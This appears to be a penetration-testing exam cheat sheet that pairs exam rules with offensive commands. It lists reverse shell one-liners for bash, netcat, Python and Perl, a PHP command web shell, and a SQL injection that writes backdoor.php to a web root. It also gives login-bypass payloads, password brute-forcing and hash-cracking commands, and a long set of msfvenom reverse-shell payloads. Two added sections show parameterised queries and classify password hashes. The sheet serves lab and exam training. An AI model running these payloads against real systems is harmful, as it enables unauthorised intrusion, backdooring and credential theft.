The Exam

  • 23 hours and 45 mins for the exam
  • You will be proctored. Webcam and screen sharing software are required
  • 6 targets. 3 standalone machines AND 1 Active Directory environment containing 2 clients and 1 domain controller
  • 70 or higher out of 100 points to pass
  • Points are awarded for each machine for which you have gained partial or complete administrative control
  • another 23 hours and 45 mins to write a report
  • +5 points if you are able to complete the lab report and the course exercises
  • You are required to be present 15 minutes before your exam start time to perform identity verification and other pre-exam tasks

Exam Restrictions

You cannot use any of the following on the exam:
  • Spoofing (IP, ARP, DNS, NBNS, etc)
  • Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
  • Automatic exploitation tools (browser_autopwn, SQLmap, SQLninja, jsql, etc.)
  • Mass vulnerability scanners (Nessus, NeXpose, OpenVAS, Core Impact, SAINT, etc.)

Course Prerequisites

1. TCP/IP Networking Fundamentals

  • TCP/IP addressing and subnetting
  • Understanding how network traffic is sent & received
  • Types of protocols and services running on them

2. Programming Languages

  • Bash
  • Python
  • Perl
  • Ruby
  • (C is nice to know, but C is not a prerequisite. Same for Awk)

3. Operating Systems Knowledge

  • Linux
  • Windows

4. Note Taking

  • I'm using a tool called CherryTree.
    Press (Alt +) Ctrl + Shift + PrtSc to screenshot a part of the screen to be selected, then go to CherryTree, Ctrl + V to paste

Preparation

Hands-on machines to prepare with: VulnHub and HackTheBox

Enumeration

Quick TCP Scan

# nmap -sC -sV -vv -oA nmap <target>

Quick UDP Scan

# nmap -sU -sV -vv -oA nmap <target>

Full TCP Scan

# nmap -sC -sV -p- -vv -oA nmap <target>

Port knock

# for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x <target>; done

Web Scanning

Gobuster Quick Directory Busting

# gobuster dir -w /usr/share/SecLists/Discovery/Web_Content/common.txt -u <target> -t 80

Gobuster Search with File Extension

# gobuster dir -w /usr/share/SecLists/Discovery/Web_Content/common.txt -u <target> -t 80 -x .txt,.php

Nikto Web Server Scan

# nikto -h <target>

Wordpress Scan

# wpscan --url <target>/wp/

Port Checking

Netcat Banner Grab

// banner motd ...
# nc -v <target> <port>

Telnet Banner Grab

# telnet <target> <port>

SMB

SMB Vulnerability Scan

# nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse <target>

SMB Users & Shares Scan

# nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse <target>

Enum4linux

# enum4linux -a <target>

Null connect (RPC)

# rpcclient -U "" <target>

Connect to SMB share

# smbclient //<target>/<share>

SNMP

SNMP Enumeration

# snmp-check <target>

Reverse Shells

Bash Shell

// In this section <target> is the IP of the host running your listener
# bash -i >& /dev/tcp/<target>/4443 0>&1

Netcat Linux Shell

# nc -e /bin/sh <target> 4443

Netcat Windows Shell

# nc -e cmd.exe <target> 4443

Python Shell :sad:

# python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<target>",4443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl Shell :rip:

# perl -e 'use Socket;$i="<target>";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Remote Desktop

Remote Desktop for Windows with share and 85% screen

// server[:port], default RDP port is 3389
# rdesktop -u username -p password -g 85% -r disk:share=/root/ <target>:<port>

PHP

PHP Command Injection from GET Request

<?php echo system($_GET["cmd"]); ?>
// Alternative
<?php echo shell_exec($_GET["cmd"]); ?>

Powershell

Non-interactive Execute Powershell File

# powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

SSH Tunneling / Pivoting

sshuttle

# sshuttle -vvr user@target 10.1.1.0/24

Port Forwarding

Local

# ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

Remote

# ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Dynamic

# ssh -D <local proxy port> -p <remote port> <target>

Plink local

// Run on the Windows host; -R is a remote forward that exposes its 3389 on <remote host>
# plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>

SQL Injection

Upload PHP Command Injection File

union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'

Load File

union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

Bypasses

' or 1=1 LIMIT 1--
' or 1=1 LIMIT 1-- -
' or 1=1 LIMIT 1#
' or 1#
' or 1=1--
' or 1=1-- -
' --
' #
' /*
' or '1'='1
' or '1'='1'--
' or '1'='1'#
' or '1'='1'/*
' or 1=1 or "="
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
') or ('1'='1
') or ('1'='1'--
') or ('1'='1'#
') or ('1'='1'/*
') or '1'='1
') or '1'='1'--
') or '1'='1'#
') or '1'='1'/*
" --
" #
" /*
" or "1"="1
" or "1"="1"--
" or "1"="1"#
" or "1"="1"/*
" or 1=1 or ""="
" or 1=1
" or 1=1#
" or 1=1/*
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"#
") or ("1"="1"/*
") or "1"="1
") or "1"="1"--
") or "1"="1"#
") or "1"="1"/*
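
To see why the strings above work and what stops them, here is an added example (not part of the original notes) with a login check written two ways against a constructed in-memory SQLite table: string concatenation, which lets the quote and comment characters change the query's structure, and a parameterised query, where the same input stays a literal value. SQLite treats `--` as a comment but not `#` (that form is MySQL-only), so the demo uses the `--` and quote-balancing variants.

```python
"""Login check with string concatenation vs. bound parameters.

Added example, not from the original cheat sheet. The users table and its
rows are constructed sample data in an in-memory SQLite database.
"""
import sqlite3


def make_db():
    """Constructed sample table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Concatenation: user input is parsed as SQL syntax.

    "' or 1=1--" as the username yields
      ... WHERE username = '' or 1=1--' AND password = 'x'
    and the rest of the WHERE clause is commented out.
    """
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterised(conn, username, password):
    """Bound parameters: the driver sends the input as a value, never as syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    # Two of the bypass strings listed above, one per input field
    print("vulnerable   :", login_vulnerable(conn, "' or 1=1--", "x"))
    print("vulnerable   :", login_vulnerable(conn, "alice", "' or '1'='1"))
    print("parameterised:", login_parameterised(conn, "' or 1=1--", "x"))
    print("parameterised:", login_parameterised(conn, "alice", "' or '1'='1"))
```

The second vulnerable call shows why the quote-balancing form `' or '1'='1` is usually placed in the password field: without a comment, the injected `or` has to sit at the end of the expression so that `AND` binds first and the trailing `'1'='1'` is what makes the whole clause true.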

Brute Force

John the Ripper Shadow File

# unshadow passwd shadow > unshadow.db
# john unshadow.db

Hashcat

// Hashcat SHA512 $6$ shadow file
# hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

// Hashcat MD5 $1$ shadow file
# hashcat -m 500 -a 0 hash.txt rockyou.txt --username

// Hashcat MD5 Apache webdav file
# hashcat -m 1600 -a 0 hash.txt rockyou.txt

// Hashcat SHA1
# hashcat -m 100 -a 0 hash.txt rockyou.txt --force

// Hashcat Wordpress
# hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
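
Picking the right `-m` mode starts with reading the `$id$` prefix of each hash. The script below is an added example, not part of the original notes: it classifies each line of a shadow file by its crypt(3) prefix and maps it to the hashcat mode used above (plus a few other documented modes), and it flags accounts still stored with md5crypt, which an audit of a modern system should turn up nothing for. The shadow lines are constructed samples with fake hash bodies.

```python
"""Classify /etc/shadow entries by hash scheme and map them to hashcat -m modes.

Added example, not part of the original cheat sheet. SAMPLE_SHADOW is a
constructed sample; the hash bodies are not real.
"""

# Prefix -> (scheme, hashcat mode). 1800, 500, 1600 and 400 are the modes used
# in the commands above; the others are hashcat's documented modes for those
# prefixes. yescrypt has no mode in that table, so it is left for john.
SCHEMES = {
    "$6$": ("sha512crypt", 1800),
    "$5$": ("sha256crypt", 7400),
    "$1$": ("md5crypt", 500),
    "$apr1$": ("Apache apr1 md5", 1600),
    "$P$": ("phpass (WordPress)", 400),
    "$H$": ("phpass (phpBB3)", 400),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$y$": ("yescrypt", None),
}

# Constructed sample shadow file
SAMPLE_SHADOW = """root:$6$salt1234$FAKEHASHBODYx:19000:0:99999:7:::
legacy:$1$abcdefgh$FAKEHASHBODYy:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
guest:!!:19000:0:99999:7:::
svc:$y$j9T$FAKE$FAKEHASHBODYz:19000:0:99999:7:::
"""


def classify_shadow_line(line):
    """Return (user, scheme, hashcat mode); locked or empty fields get mode None."""
    user, field = line.split(":", 2)[:2]
    if field in ("", "*") or field.startswith("!"):
        return user, "locked/no password", None
    for prefix, (name, mode) in SCHEMES.items():
        if field.startswith(prefix):
            return user, name, mode
    return user, "unknown", None


def classify_shadow(text):
    """Classify every non-empty line of a shadow file."""
    return [classify_shadow_line(l) for l in text.splitlines() if l.strip()]


def weak_accounts(text):
    """Accounts still hashed with md5crypt ($1$), which current distributions no longer use by default."""
    return [user for user, name, _ in classify_shadow(text) if name == "md5crypt"]


if __name__ == "__main__":
    for user, scheme, mode in classify_shadow(SAMPLE_SHADOW):
        print(f"{user:10} {scheme:22} hashcat -m {mode}")
    print("md5crypt accounts:", weak_accounts(SAMPLE_SHADOW))
```

Run it over the `unshadow` output from the John section to group hashes by scheme before launching hashcat, since one `-m` value per run is all hashcat accepts.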

RDP user with password list

# ncrack -vv --user <user> -P passwords.txt rdp://<target>

SSH user with password list

# hydra -l user -P pass.txt -t 10 -s 22 ssh://<target>

FTP user with password list

# medusa -h target -u user -P passwords.txt -M ftp

MSFVenom Payloads

// LHOST=<target> below is the IP of the host running your handler

// PHP reverse shell
# msfvenom -p php/meterpreter/reverse_tcp LHOST=<target> LPORT=4443 -f raw -o shell.php

// Java WAR reverse shell
# msfvenom -p java/shell_reverse_tcp LHOST=<target> LPORT=4443 -f war -o shell.war

// Linux bind shell
# msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

// FreeBSD x64 reverse shell
# msfvenom -p bsd/x64/shell_reverse_tcp LHOST=<target> LPORT=4443 -f elf -o shell.elf

// Linux C reverse shell
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=<target> LPORT=4443 -e x86/shikata_ga_nai -f c

// Windows non staged reverse shell
# msfvenom -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

// Windows Staged (Meterpreter) reverse shell
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<target> LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

// Windows Python reverse shell
# msfvenom -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 EXITFUNC=thread -f python -o shell.py

// Windows ASP reverse shell
# msfvenom -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp

// Windows ASPX reverse shell
# msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx

// Windows Powershell reverse shell
# msfvenom -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

// Windows reverse shell excluding bad characters
# msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=<target> LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

// Windows x64 bit reverse shell
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=<target> LPORT=4443 -f exe -o shell.exe

// Windows reverse shell embedded into plink
# msfvenom -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell.exe

Interactive Shell

Upgrading to a Fully Interactive TTY Using Python

// Enter while in reverse shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
*Ctrl-Z*

// In Kali
# stty raw -echo
# fg

// In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

File Transfers

HTTP

# python3 -m http.server 80

// Linux
$ wget http://<target>/file

// Windows
> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<target>/file.exe','C:\Users\user\Desktop\file.exe')"

FTP

# python3 -m pyftpdlib -p 21 -w

// On the Windows host, build a script for the ftp client
> echo open <target> > ftp.txt
> echo USER anonymous >> ftp.txt
> echo ftp >> ftp.txt
> echo bin >> ftp.txt
> echo GET file >> ftp.txt
> echo bye >> ftp.txt

// Execute (-n: no auto-login, -s: run the script)
> ftp -v -n -s:ftp.txt

TFTP

// In Kali
# atftpd --daemon --port 69 /tftp

// In reverse shell
$ tftp -i <target> GET nc.exe